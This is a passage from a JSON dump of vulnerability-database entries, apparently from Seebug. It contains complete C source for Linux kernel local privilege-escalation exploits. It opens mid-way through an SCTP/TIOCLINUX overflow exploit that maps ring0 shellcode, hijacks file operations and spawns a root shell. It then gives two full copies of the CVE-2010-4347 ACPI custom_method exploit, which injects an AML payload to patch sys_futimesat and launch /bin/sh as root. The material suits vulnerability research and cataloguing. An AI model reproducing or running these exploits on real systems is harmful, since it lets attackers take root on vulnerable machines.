SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);\r\n setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));\r\n}\r\n\r\n\r\nstatic int create_and_init(void)\r\n{\r\n int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n __fatal_errno("socket: sctp");\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);\r\n return fd;\r\n}\r\n\r\n\r\nstatic void connect_peer(int fd, struct sockaddr_in *s)\r\n{ \r\n int ret;\r\n ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n __fatal_errno("connect: one peer");\r\n}\r\n\r\n\r\nstatic void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)\r\n{\r\n connect_peer(fd,s);\r\n write_sctp(fd, s, stream);\r\n}\r\n\r\n\r\nstatic int clone_thread(void*useless)\r\n{\r\n int o = 1;\r\n int c=0,idx=0;\r\n int fd, ret;\r\n struct sockaddr_in tmp;\r\n socklen_t len;\r\n\r\n bindcpu();\r\n server_s.sin_family = PF_INET;\r\n server_s.sin_port = htons(srvport); \r\n server_s.sin_addr.s_addr = inet_addr(LOCALHOST);\r\n\r\n fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n return -1;\r\n\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM); \r\n setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));\r\n\r\n ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n return -1;\r\n\r\n ret = listen(fd, 100);\r\n if(ret < 0)\r\n return -1;\r\n\r\n len = sizeof(struct sockaddr_in);\r\n while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)\r\n {\r\n if(dorec != 0 && c >= dorec && idx < 10)\r\n {\r\n g_array[idx] = ret;\r\n if(idx==9)\r\n {\r\n fd_zmap_srv = ret;\r\n caddr = tmp;\r\n break;\r\n }\r\n idx++;\r\n }\r\n c++; \r\n write_sctp(ret, &tmp, zstream);\r\n }\r\n \r\n sleep(1);\r\n return 0; \r\n}\r\n\r\n\r\nstatic int do_mmap(unsigned long base, int npages)\r\n{\r\n void*addr = mmap((void*)base, PAGE_SIZE*npages,\r\n PROT_READ|PROT_WRITE|PROT_EXEC, \r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);\r\n\r\n 
if(MAP_FAILED == addr)\r\n return -1;\r\n\r\n memset(addr, 0x00, PAGE_SIZE*npages);\r\n \r\n return 0;\r\n}\r\n\r\npid_t start_listener()\r\n{\r\n pid_t pid;\r\n pid = clone(clone_thread, cstack+STACK_SIZE-8, \r\n CLONE_VM|CLONE_FILES|SIGCHLD, NULL);\r\n \r\n return pid;\r\n} \r\n\r\nstatic void do_socks(struct sockaddr_in *s, __u16 stream)\r\n{\r\n int i,fd;\r\n int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;\r\n int next=8;\r\n\r\n for(i=0; next != 0; i++)\r\n {\r\n fd = create_and_init();\r\n\r\n tmp_n_objs = get_total_object(kmalloc_fd); \r\n if(!dorec && tmp_n_objs != n_objs)\r\n dorec=i; \r\n\r\n conn_and_write(fd, s, stream);\r\n if(dorec)\r\n next--;\r\n }\r\n}\r\n\r\n\r\nstatic void clr(int fd)\r\n{\r\n /* use termcap instead..*/\r\n write(fd, "\\33[H\\33[J", 6); \r\n}\r\n\r\nstatic char tiobuffer[2048];\r\nvoid alloc_tioclinux()\r\n{\r\n int i;\r\n char out[128*3];\r\n /* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */\r\n char utf8[3] = { 0xE2, 0x94, 0xBC }; \r\n //char utf8[3] = { 0xE2, 0x80, 0xBC }; \r\n struct tiocl_selection *sel;\r\n char *t;\r\n void *v = malloc(sizeof(struct tiocl_selection) + 1);\r\n t = (char*)v; \r\n sel = (struct tiocl_selection *)(t+1);\r\n memset(out, 0x41, sizeof(out)); \r\n for(i=0; i<128; i++) \r\n {\r\n tiobuffer[(i*3)]=utf8[0];\r\n tiobuffer[(i*3)+1]=utf8[1];\r\n tiobuffer[(i*3)+2]=utf8[2];\r\n }\r\n\r\n *t = TIOCL_SETSEL;\r\n sel->xs = 1;\r\n sel->ys = 1;\r\n sel->xe = 43;\r\n //sel->xe = 42; /* no overflow */\r\n sel->ye = 1;\r\n \r\n write(1, tiobuffer, sizeof(tiobuffer));\r\n if(ioctl(1, TIOCLINUX, v) < 0)\r\n __fatal("[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\\n");\r\n}\r\n\r\n\r\n\r\nstatic void migrate_evil_fd()\r\n{\r\n int i;\r\n pid_t child;\r\n\r\n __msg("[**] Migrate evil unsafe fds to child process..\\n");\r\n child = fork();\r\n if(!child)\r\n {\r\n\r\n /* preserve evil fds */\r\n setsid(); \r\n if(!cankill) /* cant die .. 
*/\r\n while(1)\r\n sleep(1);\r\n else\r\n {\r\n sleep(10); /* wait execve() before */ \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]); \r\n\r\n exit(1);\r\n }\r\n }\r\n else\r\n {\r\n if(!cankill)\r\n __msg_f("[**] Child process %d _MUST_ NOT die ... keep it alive:)\\n", child);\r\n }\r\n}\r\n\r\n\r\nstatic void trigger_fault()\r\n{\r\n char *argv[]={"/bin/sh", NULL};\r\n int fd,i;\r\n\r\n fd = open("/proc/timer_list", O_RDONLY);\r\n if(fd >= 0)\r\n {\r\n ioctl(fd, 0, 0);\r\n __free_stuff();\r\n migrate_evil_fd();\r\n \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]);\r\n\r\n if(!getuid())\r\n {\r\n __msg("[**] Got root!\\n");\r\n execve("/bin/sh", argv, NULL); \r\n }\r\n }\r\n else\r\n {\r\n __msg("[**] Cannot open /proc/timer_list");\r\n __free_stuff();\r\n }\r\n}\r\n\r\n\r\n\r\nstatic void overwrite_fops( int sender, \r\n struct sockaddr_in *to_receiver,\r\n int receiver)\r\n{\r\n char *p = NULL;\r\n if(!highpage)\r\n p++;\r\n else\r\n p = (void*)STRUCT_PAGE_ALT;\r\n\r\n __u64 *uip = (__u64*)p; \r\n *uip = fops;\r\n write_sctp(sender, to_receiver, 1); \r\n sleep(1);\r\n trigger_fault();\r\n}\r\n\r\nstatic __u16 get_port()\r\n{\r\n __u16 r = (__u16)getpid();\r\n if(r <= 0x400)\r\n r+=0x400;\r\n return r;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int peerx, peery,i;\r\n __u64 *patch;\r\n\r\n srvport = get_port();\r\n\r\n uid=getuid();\r\n gid=getgid();\r\n fops=get_fops_addr() + 64; \r\n if(!fops)\r\n {\r\n __msg("[!!] Unable to locate symbols...\\n");\r\n return 1;\r\n }\r\n\r\n __msg_f("[**] Patching ring0 shellcode with userspace addr: %p\\n", ring0c);\r\n patch = (__u64*)(ring0 + CJUMP_OFF);\r\n *patch = (__u64)ring0c;\r\n\r\n __msg_f("[**] Using port: %d\\n", srvport);\r\n __msg("[**] Getting slab info...\\n");\r\n kmalloc_fd = get_kmalloc_fd();\r\n if(!get_total_object(kmalloc_fd)) \r\n __fatal("[!!] 
Only SLUB allocator supported\\n");\r\n \r\n\r\n __msg("[**] Mapping Segments...\\n"); \r\n __msg("[**] Trying mapping safe page...");\r\n if(do_mmap(STRUCT_PAGE, 1) < 0)\r\n {\r\n __msg("Page Protection Present (Unable to Map Safe Page)\\n");\r\n __msg("[**] Mapping High Address Page (dont kill placeholder child)\\n");\r\n if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)\r\n __fatal_errno("mmap"); \r\n\r\n cankill=0; /* dont kill child owning unsafe fds.. */\r\n highpage=1; /* ssnmap in higher pages */\r\n zstream=STREAM_ZERO_ALT; \r\n } \r\n else\r\n __msg("Done\\n");\r\n\r\n __msg("[**] Mapping Code Page... ");\r\n if(do_mmap(CODE_PAGE, 1) < 0)\r\n __fatal_errno("mmap");\r\n else\r\n __msg("Done\\n");\r\n\r\n memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));\r\n\r\n __msg("[**] Binding on CPU 0\\n"); \r\n bindcpu(); \r\n\r\n __msg("[**] Start Server Thread..\\n");\r\n child = start_listener();\r\n sleep(3); \r\n \r\n do_socks(&server_s, zstream);\r\n for(i=0; i<7; i++)\r\n {\r\n close(g_array[8-1-i]); \r\n }\r\n clr(1); \r\n alloc_tioclinux(); // trigger overflow\r\n peerx = create_and_init();\r\n connect_peer(peerx, &server_s);\r\n peery = create_and_init();\r\n connect_peer(peery, &server_s);\r\n \r\n sleep(1);\r\n\r\n unsafe_fd[0] = peerx;\r\n unsafe_fd[1] = g_array[8];\r\n unsafe_fd[2] = peery;\r\n unsafe_fd[3] = g_array[9];\r\n \r\n __msg("\\n"); \r\n __msg_f("[**] Umapped end-to-end fd: %d\\n", fd_zmap_srv); \r\n __msg_f("[**] Unsafe fd: ( ");\r\n\r\n for(i=0; i<4; i++)\r\n __msg_f("%d ", unsafe_fd[i]);\r\n __msg(")\\n"); \r\n \r\n\r\n __msg("[**] Hijacking fops...\\n");\r\n overwrite_fops(fd_zmap_srv, &caddr, peery);\r\n\r\n /* if u get here.. something nasty happens...may crash..*/\r\n __free_stuff();\r\n __msg("[**] Exploit failed.. 
freezing process\\n");\r\n kill(getpid(), SIGSTOP);\r\n return 0;\r\n}\r\n\r\n#endif\r\n\r\n// milw0rm.com [2009-07-09]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-66685", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:06:46", "description": "No description provided by source.", "published": "2010-12-19T00:00:00", "type": "seebug", "title": "Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4347"], "modified": "2010-12-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20296", "id": "SSV:20296", "sourceData": "\n /*\r\n * american-sign-language.c\r\n *\r\n * Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347\r\n *\r\n * This custom_method file allows to inject custom ACPI methods into the ACPI\r\n * interpreter tables. This control file was introduced with world writeable\r\n * permissions in Linux Kernel 2.6.33.\r\n *\r\n * Usage:\r\n *\r\n * $ gcc american-sign-language.c -o american-sign-language\r\n * $ ./american-sign-language\r\n * [+] resolving required symbols...\r\n * [+] checking for world-writable custom_method...\r\n * [+] checking for an ACPI LID device...\r\n * [+] poisoning ACPI tables via custom_method...\r\n * [+] triggering ACPI payload via LID device...\r\n * [+] triggering exploit via futimesat...\r\n * [+] launching root shell!\r\n * # id\r\n * uid=0(root) gid=0(root) groups=0(root)\r\n *\r\n * Notes:\r\n *\r\n * This vuln allows us to write custom ACPI methods and load them into the\r\n * kernel as an unprivileged user. We compile some fancy ASL down to AML\r\n * that overrides the ACPI method used when the status of the LID device is\r\n * queried (eg. 'open' or 'closed' lid on a laptop). 
When the method is\r\n * triggered, it overlays an OperationRegion on the physical address where\r\n * sys_futimesat is located and overwrites the memory via the Store to\r\n * escalate privileges whenever sys_futimesat is called.\r\n *\r\n * The payload is 64-bit only and depends on the existence of a LID device\r\n * (eg. laptop), but the exploit will still tell you if you're vulnerable\r\n * regardless. If you don't know how to work around these limitations, you\r\n * probably shouldn't be running this in the first place. :-P\r\n *\r\n * Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <inttypes.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/utsname.h>\r\n \r\n/*\r\n * The ASL payload looks like:\r\n *\r\n * DefinitionBlock ("lid.aml", "SSDT", 2, "", "", 0x00001001) {\r\n * Method (\\_SB.LID._LID, 0, NotSerialized) {\r\n * OperationRegion (KMEM, SystemMemory, PHYADDR, 0x392)\r\n * Field(KMEM, AnyAcc, NoLock, Preserve) {\r\n * HACK, 0x392\r\n * }\r\n * Store (Buffer () {\r\n * 0x55, 0x48, 0x89, 0xe5, 0x53, 0x48, 0x83, 0xec,\r\n * 0x08, 0x48, 0xc7, 0xc3, 0x24, 0x24, 0x24, 0x24,\r\n * 0x48, 0xc7, 0xc0, 0x24, 0x24, 0x24, 0x24, 0xbf,\r\n * 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,\r\n * 0xc7, 0xff, 0xd3, 0x48, 0xc7, 0xc0, 0xb7, 0xff,\r\n * 0xff, 0xff, 0x48, 0x83, 0xc4, 0x08, 0x5b, 0xc9,\r\n * 0xc3 }, HACK)\r\n * Return (One)\r\n * }\r\n * }\r\n *\r\n * Feel free to `iasl -d` this is you don't trust me! 
;-)\r\n */\r\n#define PAYLOAD_AML \\\r\n"\\x53\\x53\\x44\\x54\\x90\\x00\\x00\\x00\\x02\\x3e\\x00\\x00\\x00\\x00\\x00\\x00" \\\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x10\\x00\\x00\\x49\\x4e\\x54\\x4c" \\\r\n"\\x21\\x05\\x09\\x20\\x14\\x4b\\x06\\x5c\\x2f\\x03\\x5f\\x53\\x42\\x5f\\x4c\\x49" \\\r\n"\\x44\\x5f\\x5f\\x4c\\x49\\x44\\x00\\x5b\\x80\\x4b\\x4d\\x45\\x4d\\x00\\x0c\\xe0" \\\r\n"\\x61\\x17\\x01\\x0b\\x92\\x03\\x5b\\x81\\x0c\\x4b\\x4d\\x45\\x4d\\x00\\x48\\x41" \\\r\n"\\x43\\x4b\\x42\\x39\\x70\\x11\\x34\\x0a\\x31\\x55\\x48\\x89\\xe5\\x53\\x48\\x83" \\\r\n"\\xec\\x08\\x48\\xc7\\xc3\\x24\\x24\\x24\\x24\\x48\\xc7\\xc0\\x24\\x24\\x24\\x24" \\\r\n"\\xbf\\x00\\x00\\x00\\x00\\xff\\xd0\\x48\\x89\\xc7\\xff\\xd3\\x48\\xc7\\xc0\\xb7" \\\r\n"\\xff\\xff\\xff\\x48\\x83\\xc4\\x08\\x5b\\xc9\\xc3\\x48\\x41\\x43\\x4b\\xa4\\x01"\r\n#define PAYLOAD_LEN 144\r\n \r\n#define CUSTOM_METHOD "/sys/kernel/debug/acpi/custom_method"\r\n#define HEY_ITS_A_LID "/proc/acpi/button/lid/LID/state"\r\n \r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n \r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n \r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n return addr;\r\n 
}\r\n }\r\n \r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n \r\nint\r\nmain(int argc, char **argv)\r\n{\r\n int ret;\r\n FILE *fp;\r\n char buf[64];\r\n struct stat sb;\r\n char payload[PAYLOAD_LEN] = PAYLOAD_AML;\r\n unsigned long sys_futimesat, prepare_kernel_cred, commit_creds;\r\n \r\n printf("[+] resolving required symbols...\\n");\r\n \r\n sys_futimesat = get_symbol("sys_futimesat");\r\n if (!sys_futimesat) {\r\n printf("[-] sys_futimesat symbol not found, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n prepare_kernel_cred = get_symbol("prepare_kernel_cred");\r\n if (!prepare_kernel_cred) {\r\n printf("[-] prepare_kernel_cred symbol not found, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n commit_creds = get_symbol("commit_creds");\r\n if (!commit_creds) {\r\n printf("[-] commit_creds symbol not found, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] checking for world-writable custom_method...\\n");\r\n \r\n ret = stat(CUSTOM_METHOD, &sb);\r\n if (ret < 0) {\r\n printf("[-] custom_method not found, kernel is not vulnerable!\\n");\r\n exit(1);\r\n }\r\n \r\n if (!(sb.st_mode & S_IWOTH)) {\r\n printf("[-] custom_method not world-writable, kernel is not vulnerable!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] checking for an ACPI LID device...\\n");\r\n \r\n ret = stat(HEY_ITS_A_LID, &sb);\r\n if (ret < 0) {\r\n printf("[-] ACPI LID device not found, but kernel is still vulnerable!\\n");\r\n exit(1);\r\n }\r\n \r\n if (sizeof(sys_futimesat) != 8) {\r\n printf("[-] payload is 64-bit only, but kernel is still vulnerable!\\n");\r\n exit(1);\r\n }\r\n \r\n sys_futimesat &= ~0xffffffff80000000;\r\n memcpy(&payload[63], &sys_futimesat, 4);\r\n memcpy(&payload[101], &commit_creds, 4);\r\n memcpy(&payload[108], &prepare_kernel_cred, 
4);\r\n \r\n printf("[+] poisoning ACPI tables via custom_method...\\n");\r\n \r\n fp = fopen(CUSTOM_METHOD, "w");\r\n fwrite(payload, 1, sizeof(payload), fp);\r\n fclose(fp);\r\n \r\n printf("[+] triggering ACPI payload via LID device...\\n");\r\n \r\n fp = fopen(HEY_ITS_A_LID, "r");\r\n fread(&buf, 1, sizeof(buf), fp);\r\n fclose(fp);\r\n \r\n printf("[+] triggering exploit via futimesat...\\n");\r\n \r\n ret = futimesat(0, "/tmp", NULL);\r\n \r\n if (ret != -1 || errno != EDOTDOT) {\r\n printf("[-] unexpected futimesat errno, exploit failed!\\n");\r\n exit(1);\r\n }\r\n \r\n if (getuid() != 0) {\r\n printf("[-] privileges not escalated, exploit failed!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] launching root shell!\\n");\r\n execl("/bin/sh", "/bin/sh", NULL);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20296", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:37:25", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4347"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70421", "id": "SSV:70421", "sourceData": "\n /*\r\n * american-sign-language.c\r\n *\r\n * Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347\r\n *\r\n * This custom_method file allows to inject custom ACPI methods into the ACPI\r\n * interpreter tables. 
This control file was introduced with world writeable\r\n * permissions in Linux Kernel 2.6.33.\r\n *\r\n * Usage:\r\n * \r\n * $ gcc american-sign-language.c -o american-sign-language\r\n * $ ./american-sign-language\r\n * [+] resolving required symbols...\r\n * [+] checking for world-writable custom_method...\r\n * [+] checking for an ACPI LID device...\r\n * [+] poisoning ACPI tables via custom_method...\r\n * [+] triggering ACPI payload via LID device...\r\n * [+] triggering exploit via futimesat...\r\n * [+] launching root shell!\r\n * # id\r\n * uid=0(root) gid=0(root) groups=0(root)\r\n *\r\n * Notes:\r\n *\r\n * This vuln allows us to write custom ACPI methods and load them into the\r\n * kernel as an unprivileged user. We compile some fancy ASL down to AML \r\n * that overrides the ACPI method used when the status of the LID device is \r\n * queried (eg. 'open' or 'closed' lid on a laptop). When the method is \r\n * triggered, it overlays an OperationRegion on the physical address where \r\n * sys_futimesat is located and overwrites the memory via the Store to \r\n * escalate privileges whenever sys_futimesat is called.\r\n *\r\n * The payload is 64-bit only and depends on the existence of a LID device\r\n * (eg. laptop), but the exploit will still tell you if you're vulnerable\r\n * regardless. If you don't know how to work around these limitations, you \r\n * probably shouldn't be running this in the first place. 
:-P\r\n *\r\n * Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <inttypes.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/utsname.h>\r\n\r\n/*\r\n * The ASL payload looks like:\r\n *\r\n * DefinitionBlock ("lid.aml", "SSDT", 2, "", "", 0x00001001) {\r\n * Method (\\_SB.LID._LID, 0, NotSerialized) {\r\n * OperationRegion (KMEM, SystemMemory, PHYADDR, 0x392)\r\n * Field(KMEM, AnyAcc, NoLock, Preserve) {\r\n * HACK, 0x392\r\n * }\r\n * Store (Buffer () {\r\n * 0x55, 0x48, 0x89, 0xe5, 0x53, 0x48, 0x83, 0xec,\r\n * 0x08, 0x48, 0xc7, 0xc3, 0x24, 0x24, 0x24, 0x24,\r\n * 0x48, 0xc7, 0xc0, 0x24, 0x24, 0x24, 0x24, 0xbf,\r\n * 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,\r\n * 0xc7, 0xff, 0xd3, 0x48, 0xc7, 0xc0, 0xb7, 0xff,\r\n * 0xff, 0xff, 0x48, 0x83, 0xc4, 0x08, 0x5b, 0xc9,\r\n * 0xc3 }, HACK)\r\n * Return (One)\r\n * }\r\n * }\r\n * \r\n * Feel free to `iasl -d` this is you don't trust me! 
;-)\r\n */\r\n#define PAYLOAD_AML \\\r\n"\\x53\\x53\\x44\\x54\\x90\\x00\\x00\\x00\\x02\\x3e\\x00\\x00\\x00\\x00\\x00\\x00" \\\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x10\\x00\\x00\\x49\\x4e\\x54\\x4c" \\\r\n"\\x21\\x05\\x09\\x20\\x14\\x4b\\x06\\x5c\\x2f\\x03\\x5f\\x53\\x42\\x5f\\x4c\\x49" \\\r\n"\\x44\\x5f\\x5f\\x4c\\x49\\x44\\x00\\x5b\\x80\\x4b\\x4d\\x45\\x4d\\x00\\x0c\\xe0" \\\r\n"\\x61\\x17\\x01\\x0b\\x92\\x03\\x5b\\x81\\x0c\\x4b\\x4d\\x45\\x4d\\x00\\x48\\x41" \\\r\n"\\x43\\x4b\\x42\\x39\\x70\\x11\\x34\\x0a\\x31\\x55\\x48\\x89\\xe5\\x53\\x48\\x83" \\\r\n"\\xec\\x08\\x48\\xc7\\xc3\\x24\\x24\\x24\\x24\\x48\\xc7\\xc0\\x24\\x24\\x24\\x24" \\\r\n"\\xbf\\x00\\x00\\x00\\x00\\xff\\xd0\\x48\\x89\\xc7\\xff\\xd3\\x48\\xc7\\xc0\\xb7" \\\r\n"\\xff\\xff\\xff\\x48\\x83\\xc4\\x08\\x5b\\xc9\\xc3\\x48\\x41\\x43\\x4b\\xa4\\x01"\r\n#define PAYLOAD_LEN 144\r\n\r\n#define CUSTOM_METHOD "/sys/kernel/debug/acpi/custom_method"\r\n#define HEY_ITS_A_LID "/proc/acpi/button/lid/LID/state"\r\n\r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy;\r\n\tchar sname[512];\r\n\tstruct utsname ver;\r\n\tint ret;\r\n\tint rep = 0;\r\n\tint oldstyle = 0;\r\n \r\n\tf = fopen("/proc/kallsyms", "r");\r\n\tif (f == NULL) {\r\n\t\tf = fopen("/proc/ksyms", "r");\r\n\t\tif (f == NULL)\r\n\t\t\tgoto fallback;\r\n\t\toldstyle = 1;\r\n\t}\r\n \r\nrepeat:\r\n\tret = 0;\r\n\twhile(ret != EOF) {\r\n\t\tif (!oldstyle)\r\n\t\t\tret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n\t\telse {\r\n\t\t\tret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n\t\t\tif (ret == 2) {\r\n\t\t\t\tchar *p;\r\n\t\t\t\tif (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n\t\t\t\t\tcontinue;\r\n\t\t\t\tp = strrchr(sname, '_');\r\n\t\t\t\tif (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n\t\t\t\t\tp = p - 4;\r\n\t\t\t\t\twhile (p > (char *)sname && *(p - 1) == '_')\r\n\t\t\t\t\t\tp--;\r\n\t\t\t\t\t*p = 
'\\0';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, "%s\\n", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n \r\n\tfclose(f);\r\n\tif (rep)\r\n\t\treturn 0;\r\nfallback:\r\n\tuname(&ver);\r\n\tif (strncmp(ver.release, "2.6", 3))\r\n\t\toldstyle = 1;\r\n\tsprintf(sname, "/boot/System.map-%s", ver.release);\r\n\tf = fopen(sname, "r");\r\n\tif (f == NULL)\r\n\t\treturn 0;\r\n\trep = 1;\r\n\tgoto repeat;\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint ret;\r\n\tFILE *fp;\r\n\tchar buf[64];\r\n\tstruct stat sb;\r\n\tchar payload[PAYLOAD_LEN] = PAYLOAD_AML;\r\n\tunsigned long sys_futimesat, prepare_kernel_cred, commit_creds;\r\n\r\n\tprintf("[+] resolving required symbols...\\n");\r\n\r\n\tsys_futimesat = get_symbol("sys_futimesat");\r\n\tif (!sys_futimesat) {\r\n\t\tprintf("[-] sys_futimesat symbol not found, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprepare_kernel_cred = get_symbol("prepare_kernel_cred");\r\n\tif (!prepare_kernel_cred) {\r\n\t\tprintf("[-] prepare_kernel_cred symbol not found, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tcommit_creds = get_symbol("commit_creds");\r\n\tif (!commit_creds) {\r\n\t\tprintf("[-] commit_creds symbol not found, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] checking for world-writable custom_method...\\n");\r\n\r\n\tret = stat(CUSTOM_METHOD, &sb);\r\n\tif (ret < 0) {\r\n\t\tprintf("[-] custom_method not found, kernel is not vulnerable!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (!(sb.st_mode & S_IWOTH)) {\r\n\t\tprintf("[-] custom_method not world-writable, kernel is not vulnerable!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] checking for an ACPI LID device...\\n");\r\n\r\n\tret = stat(HEY_ITS_A_LID, &sb);\r\n\tif (ret < 0) {\r\n\t\tprintf("[-] ACPI LID device not found, but kernel is still vulnerable!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (sizeof(sys_futimesat) != 8) 
{\r\n\t\tprintf("[-] payload is 64-bit only, but kernel is still vulnerable!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tsys_futimesat &= ~0xffffffff80000000;\r\n\tmemcpy(&payload[63], &sys_futimesat, 4);\r\n\tmemcpy(&payload[101], &commit_creds, 4);\r\n\tmemcpy(&payload[108], &prepare_kernel_cred, 4);\r\n\r\n\tprintf("[+] poisoning ACPI tables via custom_method...\\n");\r\n\r\n\tfp = fopen(CUSTOM_METHOD, "w");\r\n\tfwrite(payload, 1, sizeof(payload), fp);\r\n\tfclose(fp);\r\n\r\n\tprintf("[+] triggering ACPI payload via LID device...\\n");\r\n\r\n\tfp = fopen(HEY_ITS_A_LID, "r");\r\n\tfread(&buf, 1, sizeof(buf), fp);\r\n\tfclose(fp);\r\n\r\n\tprintf("[+] triggering exploit via futimesat...\\n");\r\n\r\n\tret = futimesat(0, "/tmp", NULL);\r\n\r\n\tif (ret != -1 || errno != EDOTDOT) {\r\n\t\tprintf("[-] unexpected futimesat errno, exploit failed!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (getuid() != 0) {\r\n\t\tprintf("[-] privileges not escalated, 